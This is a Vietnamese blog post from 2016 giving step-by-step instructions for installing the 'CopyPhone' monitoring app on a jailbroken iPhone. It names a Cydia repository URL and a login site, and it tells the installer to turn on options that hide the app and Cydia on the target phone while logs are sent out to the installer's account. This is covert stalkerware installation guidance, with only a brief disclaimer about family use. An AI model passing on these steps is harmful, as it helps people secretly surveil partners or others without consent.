Thứ Hai, 23 tháng 5, 2016

Hướng dẫn cài phần mềm theo dõi trên iPhone

-Copyphone đã tương thích cho iPhone có iOS 8x đã jailbreak và hổ trợ đầy đủ tất cả các tính năng.
-Chú ý trước khi cài: Điện thoại mục tiêu cần phải có GPRS/3G/WIFI
- Bạn cần phải có một email cá nhân để hoàn thành việc đăng ký
Cydia –-> manage –-> Source –-> Edit –-> Add –> Add  Source :  http://cydia.myrepospace.com/duc –>  Chọn Prox-myrepospace.com –-> Deprox –-> Install –-> Confirm –-> Return to Cydia ( Change Package Settings – Show all Changes – Details) –-> Nhập email của bạn,( bạn sẽ được sử dụng 3 ngày miễn phí)
–->  Lựa chọn tính năng ở mục Data setting –> mục Data send setting ( web, email) –> mục systeem app setting ( chọn Hide application, Hide cydia application, send logs..) –> systeem app setting ( chọn Upload Settings, Auto download Settings..) —> Chọn nút Home.
Hướng dẫn cài phần mềm theo dõi trên iPhone bằng Video:


Hướng dẫn bằng hình ảnh:
        
                
            
           
            
           
         
      
001
001
001
001
001
001
001
001
001
001
Kiểm tra Email của bạn, phần mềm đã tự động gởi email mà bạn đã đăng ký.
Hãy đăng nhập vào tài khoản của bạn để kiểm tra thông tin
Bạn có thể chọn những tính năng mà bạn cần sau đó chọn Upload Setting.
Nếu bạn đã lựa chọn trước tính năng trên tải khoảng của bạn. bạn chỉ cần chọn vào Download Setting.
Nhập email và password mà bạn đã đăng ký vào Trang đăng nhập :http://quanlydienthoai.net.Bạn lựa chọn chức năng từ Account Settings ở đây: Sau đó Save
Chú ý: CopyPhone là phần mềm chuyên quản lý điện thoại người thân, không nên để con cái chưa đủ tuổi thành niên lạm dụng điện thoại để chat, sexting… Chúng tôi không chịu trách nhiệm việc sử dụng CopyPhone để làm hại người khác.